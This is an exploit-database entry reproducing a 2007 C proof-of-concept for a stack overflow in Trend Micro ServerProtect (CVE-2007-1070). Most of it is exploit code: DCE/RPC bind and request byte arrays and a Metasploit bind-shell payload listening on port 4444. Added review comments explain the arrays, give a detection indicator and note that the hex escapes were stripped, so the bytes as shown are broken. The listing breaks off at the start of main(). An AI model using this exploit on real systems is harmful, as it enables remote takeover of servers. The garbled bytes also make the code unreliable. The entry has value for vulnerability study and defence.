Trend Micro ServerProtect eng50.dll Stack Overflow Exploit

2007-09-06T00:00:00
ID SSV:7230
Type seebug
Reporter Root
Modified 2007-09-06T00:00:00

Description

No description provided by source.

                                        
                                            
                                                /* 
 * Copyright (c) 2007 devcode
 *
 *
 *			^^ D E V C O D E ^^
 *
 * Trend Micro ServerProtect eng50.dll Stack Overflow
 * [CVE-2007-1070]
 *
 *
 * Description:
 *    A boundary error within a function in eng50.dll can be
 *    exploited to cause a stack-based buffer overflow via a
 *    specially crafted RPC request to the SpntSvc.exe service.
 *
 * Hotfix/Patch:
 *    http://www.trendmicro.com/download/product.asp?productid=17
 *
 * Vulnerable systems:
 *    ServerProtect for Windows 5.58
 *    ServerProtect for EMC 5.58
 *    ServerProtect for Network Appliance Filer 5.61
 *    ServerProtect for Network Appliance Filer 5.62
 *
 * Tested on:
 * 	  Microsoft Windows 2000 SP4
 * 
 *    This is a PoC and was created for educational purposes only. The
 *    author is not held responsible if this PoC does not work or is 
 *    used for any other purposes than the one stated above.
 *
 * Notes:
 *	  <3 TippingPoint for technical details. Had this made a few days after
 *    disclosure (a few months back); it was released on r1918 about a week ago
 *    and I noticed Trend Micro exploit reports on isc.sans.org. DIDNT KNOW
 *    I WAS THIS HOT DAYUM
 *
 *
 */
#include <stdio.h>
#include <iostream>
#include <windows.h>
 
#pragma comment( lib, "ws2_32.lib" )
 
/* 25288888-bd5b-11d1-9d53-0080c83a5c2c v1.0 */
/*
 * Presumably the DCE/RPC bind request for the interface whose UUID is
 * given in the comment above (inferred from the array name and the CVE
 * description in the file header; the header fields are not decoded
 * here -- verify against a protocol decoder before relying on it).
 *
 * NOTE(review): the backslashes of the "\x" hex escapes look like they
 * were stripped when this listing was extracted, so as written the
 * initializer is plain ASCII text rather than the intended byte values.
 * Also, because the array is sized by a string literal, sizeof includes
 * the terminating NUL -- account for that when deriving a length from it.
 */
unsigned char uszDceBind[] =
	"x05x00x0Bx03x10x00x00x00x48x00x00x00x01x00x00x00"
	"xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00" 
	"x88x88x28x25x5BxBDxD1x11x9Dx53x00x80xC8x3Ax5Cx2C" 
	"x01x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00"
	"x2Bx10x48x60x02x00x00x00";
 
/* rpc_opnum_0 */
/*
 * Presumably the DCE/RPC request header for opnum 0 of the interface
 * bound above (inferred from the comment and the array name; the
 * fields are not decoded here). main() appears to append further data
 * to it, but that code is cut off in this listing -- confirm there.
 *
 * NOTE(review): as with uszDceBind, the "\x" escape backslashes appear
 * to have been lost during extraction, so this is ASCII text as written,
 * and sizeof on the array counts the string literal's terminating NUL.
 */
unsigned char uszDceCall[] =
	"x05x00x00x83x10x00x00x00x08x08x00x00x01x00x00x00"
	"xE0x07x00x00x00x00x00x00x88x88x28x25x5BxBDxD1x11"
	"x9Dx53x00x80xC8x3Ax5Cx2Cx04x00x03x00xD0x07x00x00";
 
/* win32_bind -  EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */
/*
 * Payload bytes as emitted by the generator named in the comment above
 * (a bind-shell listener on TCP/4444 according to that generator string;
 * the bytes themselves are not decoded here). 21 lines of 16 escapes
 * plus a final 6 matches the stated Size=342; with intact escapes the
 * array's sizeof would be one larger, because the string literal adds
 * a terminating NUL.
 *
 * NOTE(review): the "\x" escape backslashes appear to have been lost
 * during extraction, so this initializer is ASCII text as written.
 *
 * Defensive note: the stated LPORT makes an unexpected listening socket
 * opened by the exploited service (SpntSvc.exe per the file header) a
 * concrete detection indicator for this PoC, independent of the encoder.
 */
unsigned char uszShellcode[] =
	"x6ax50x59xd9xeexd9x74x24xf4x5bx81x73x13x76xd2xab"
	"x1fx83xebxfcxe2xf4x8axb8x40x52x9ex2bx54xe0x89xb2"
	"x20x73x52xf6x20x5ax4ax59xd7x1ax0exd3x44x94x39xca"
	"x20x40x56xd3x40x56xfdxe6x20x1ex98xe3x6bx86xdax56"
	"x6bx6bx71x13x61x12x77x10x40xebx4dx86x8fx37x03x37"
	"x20x40x52xd3x40x79xfdxdexe0x94x29xcexaaxf4x75xfe"
	"x20x96x1axf6xb7x7exb5xe3x70x7bxfdx91x9bx94x36xde"
	"x20x6fx6ax7fx20x5fx7ex8cxc3x91x38xdcx47x4fx89x04"
	"xcdx4cx10xbax98x2dx1exa5xd8x2dx29x86x54xcfx1ex19"
	"x46xe3x4dx82x54xc9x29x5bx4ex79xf7x3fxa3x1dx23xb8"
	"xa9xe0xa6xbax72x16x83x7fxfcxe0xa0x81xf8x4cx25x81"
	"xe8x4cx35x81x54xcfx10xbaxbax43x10x81x22xfexe3xba"
	"x0fx05x06x15xfcxe0xa0xb8xbbx4ex23x2dx7bx77xd2x7f"
	"x85xf6x21x2dx7dx4cx23x2dx7bx77x93x9bx2dx56x21x2d"
	"x7dx4fx22x86xfexe0xa6x41xc3xf8x0fx14xd2x48x89x04"
	"xfexe0xa6xb4xc1x7bx10xbaxc8x72xffx37xc1x4fx2fxfb"
	"x67x96x91xb8xefx96x94xe3x6bxecxdcx2cxe9x32x88x90"
	"x87x8cxfbxa8x93xb4xddx79xc3x6dx88x61xbdxe0x03x96"
	"x54xc9x2dx85xf9x4ex27x83xc1x1ex27x83xfex4ex89x02"
	"xc3xb2xafxd7x65x4cx89x04xc1xe0x89xe5x54xcfxfdx85"
	"x57x9cxb2xb6x54xc9x24x2dx7bx77x99x1cx4bx7fx25x2d"
	"x7dxe0xa6xd2xabx1f";
 
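/*
 * Print the banner and command-line synopsis to stdout.
 *
 * As listed, the original string literal contained raw line breaks
 * (the "\n" escapes were lost in extraction), which does not compile;
 * each break is restored as an explicit "\n" and the text is split into
 * adjacent literals so every output line is visible as its own source
 * line. fputs() is used instead of printf(): the banner carries no
 * conversion specifications, so there is nothing to format, and keeping
 * fixed text out of the format-string path is the safer default.
 */
void usage(void) {
	fputs("\n"
	      "\t\tTrend Micro ServerProtect Stack Overflow\n"
	      "\t\t\t(c) 2007 devcode\n"
	      "\n"
	      "usage: tmicro.exe <ip> <port>\n",
	      stdout);
}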
 
int main( int argc, char **argv ) {
	WSADATA wsaData;
	SOCKET sConnect;
	SOCKADDR_IN sockAddr;
	char szRecvBuf[512];
	unsigned char uszPacket&